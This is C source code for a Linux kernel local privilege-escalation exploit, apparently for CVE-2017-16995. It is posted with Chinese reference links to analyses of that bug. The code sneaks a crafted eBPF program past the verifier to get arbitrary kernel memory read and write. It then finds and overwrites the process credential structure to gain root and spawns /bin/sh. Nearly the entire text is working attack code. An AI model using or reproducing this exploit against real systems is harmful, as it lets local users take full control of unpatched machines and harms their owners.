		.code  = BPF_ALU | BPF_MOV | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_MOV64_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_MOV32_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_LD_IMM64(DST, IMM)					\
	BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_LD | BPF_DW | BPF_IMM,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = (__u32) (IMM) }),			\
	((struct bpf_insn) {					\
		.code  = 0, 					\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = ((__u64) (IMM)) >> 32 })

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD	1
#endif

#define BPF_LD_MAP_FD(DST, MAP_FD)				\
	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

#define BPF_STX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

#define BPF_ST_MEM(SIZE, DST, OFF, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

#define BPF_JMP_IMM(OP, DST, IMM, OFF)				\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_OP(OP) | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)			\
	((struct bpf_insn) {					\
		.code  = CODE,					\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = IMM })

#define BPF_EXIT_INSN()						\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_EXIT,			\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_DISABLE_VERIFIER()                                                       \
	BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),             /* r2 = (u32)0xFFFFFFFF   */   \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),   /* if (r2 == -1) {        */   \
	BPF_MOV64_IMM(BPF_REG_0, 0),                      /*   exit(0);             */   \
	BPF_EXIT_INSN()                                   /* }                      */   \

#define BPF_MAP_GET(idx, dst)                                                        \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),              /* r1 = r9                */   \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),             /* r2 = fp                */   \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),            /* r2 = fp - 4            */   \
	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),           /* *(u32 *)(fp - 4) = idx */   \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),             \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),            /* if (r0 == 0)           */   \
	BPF_EXIT_INSN(),                                  /*   exit(0);             */   \
	BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0)          /* r_dst = *(u64 *)(r0)   */              

static int load_prog() {
	struct bpf_insn prog[] = {
		BPF_DISABLE_VERIFIER(),

		BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16),   /* *(fp - 16) = r1       */

		BPF_LD_MAP_FD(BPF_REG_9, mapfd),

		BPF_MAP_GET(0, BPF_REG_6),                         /* r6 = op               */
		BPF_MAP_GET(1, BPF_REG_7),                         /* r7 = address          */
		BPF_MAP_GET(2, BPF_REG_8),                         /* r8 = value            */

		/* store map slot address in r2 */
		BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0               */
		BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0  for exit(0)   */

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2),             /* if (op == 0)          */
		/* get fp */
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),
		BPF_EXIT_INSN(),

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),             /* else if (op == 1)     */
		/* get skbuff */
		BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16),
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
		BPF_EXIT_INSN(),

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3),             /* else if (op == 2)     */
		/* read */
		BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0),
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
		BPF_EXIT_INSN(),
		/* else                  */
		/* write */
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), 
		BPF_EXIT_INSN(),

	};
	return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}

void info(const char *fmt, ...) {
	va_list args;
	va_start(args, fmt);
	fprintf(stdout, "[.] ");
	vfprintf(stdout, fmt, args);
	va_end(args);
}

void msg(const char *fmt, ...) {
	va_list args;
	va_start(args, fmt);
	fprintf(stdout, "[*] ");
	vfprintf(stdout, fmt, args);
	va_end(args);
}

void redact(const char *fmt, ...) {
	va_list args;
	va_start(args, fmt);
	if(doredact) {
		fprintf(stdout, "[!] ( ( R E D A C T E D ) )\n");
		return;
	}
	fprintf(stdout, "[*] ");
	vfprintf(stdout, fmt, args);
	va_end(args);
}

void fail(const char *fmt, ...) {
	va_list args;
	va_start(args, fmt);
	fprintf(stdout, "[!] ");
	vfprintf(stdout, fmt, args);
	va_end(args);
	exit(1);
}

void 
initialize() {
	info("\n");
	info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
	info("\n");
	info("  ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
	info("\n");

	redact("creating bpf map\n");
	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
	if (mapfd < 0) {
		fail("failed to create bpf map: '%s'\n", strerror(errno));
	}

	redact("sneaking evil bpf past the verifier\n");
	progfd = load_prog();
	if (progfd < 0) {
		if (errno == EACCES) {
			msg("log:\n%s", bpf_log_buf);
		}
		fail("failed to load prog '%s'\n", strerror(errno));
	}

	redact("creating socketpair()\n");
	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
		fail("failed to create socket pair '%s'\n", strerror(errno));
	}

	redact("attaching bpf backdoor to socket\n");
	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
		fail("setsockopt '%s'\n", strerror(errno));
	}
}

static void writemsg() {
	ssize_t n = write(sockets[0], buffer, sizeof(buffer));
	if (n < 0) {
		perror("write");
		return;
	}
	if (n != sizeof(buffer)) {
		fprintf(stderr, "short write: %d\n", n);
	}
}

static void 
update_elem(int key, unsigned long value) {
	if (bpf_update_elem(mapfd, &key, &value, 0)) {
		fail("bpf_update_elem failed '%s'\n", strerror(errno));
	}
}

static unsigned long 
get_value(int key) {
	unsigned long value;
	if (bpf_lookup_elem(mapfd, &key, &value)) {
		fail("bpf_lookup_elem failed '%s'\n", strerror(errno));
	}
	return value;
}

static unsigned long
sendcmd(unsigned long op, unsigned long addr, unsigned long value) {
	update_elem(0, op);
	update_elem(1, addr);
	update_elem(2, value);
	writemsg();
	return get_value(2);
}

unsigned long
get_skbuff() {
	return sendcmd(1, 0, 0);
}

unsigned long
get_fp() {
	return sendcmd(0, 0, 0);
}

unsigned long
read64(unsigned long addr) {
	return sendcmd(2, addr, 0);
}

void
write64(unsigned long addr, unsigned long val) {
	(void)sendcmd(3, addr, val);
}

static unsigned long find_sk_rcvtimeo() {
	uid_t uid = getuid();
	unsigned long skbuff = get_skbuff();
	/*
	 * struct sk_buff {
	 *     [...24 byte offset...]
	 *     struct sock     *sk;
	 * };
	 *
	 */
	unsigned long addr = read64(skbuff + 24);
	msg("Leaking sock struct from %llx\n", addr);
	/*
	 * scan forward for expected sk_rcvtimeo value.
	 *
	 * struct sock {
	 *    [...]
	 *    long                    sk_rcvtimeo;             
	 *  };
	 */
	for (int i = 0; i < 100; i++, addr += 8) {
		if(read64(addr) == 0x7FFFFFFFFFFFFFFF) {
			/*if(read64(addr - 24) != uid) {
				continue;
			}*/
			msg("found sock->sk_rcvtimeo at offset %d\n", i * 8);
			return addr;
		}
	}
	fail("failed to find sk_rcvtimeo.\n");
}

static unsigned long find_cred() {
	/*
	 * struct sock {
	 *    [...]
	 *    const struct cred       *sk_peer_cred;
	 *    long                    sk_rcvtimeo;             
	 *  };
	 */
	long result = read64(find_sk_rcvtimeo() - 8);
	msg("found sock->sk_peer_cred\n");
	return result;
}

static void
hammer_cred(unsigned long addr) {
	msg("hammering cred structure at %llx\n", addr);
#define w64(w) { write64(addr, (w)); addr += 8; }
	unsigned long val = read64(addr) & 0xFFFFFFFFUL;
	w64(val); 
	w64(0); w64(0); w64(0); w64(0);
	w64(0xFFFFFFFFFFFFFFFF); 
	w64(0xFFFFFFFFFFFFFFFF); 
	w64(0xFFFFFFFFFFFFFFFF); 
#undef w64
}

int
main(int argc, char **argv) {
	initialize();
	hammer_cred(find_cred());
	msg("credentials patched, launching shell...\n");
	if(execl("/bin/sh", "/bin/sh", NULL)) {
		fail("exec %s\n", strerror(errno));
	}
}

参考链接

[1]https://dangokyo.me/2018/05/24/analysis-on-cve-2017-16995/

[2]https://security.tencent.com/index.php/blog/msg/124

[3]https://bbs.pediy.com/thread-249033.htm

[4]https://www.cnblogs.com/rebeyond/p/8921307.html

1 Like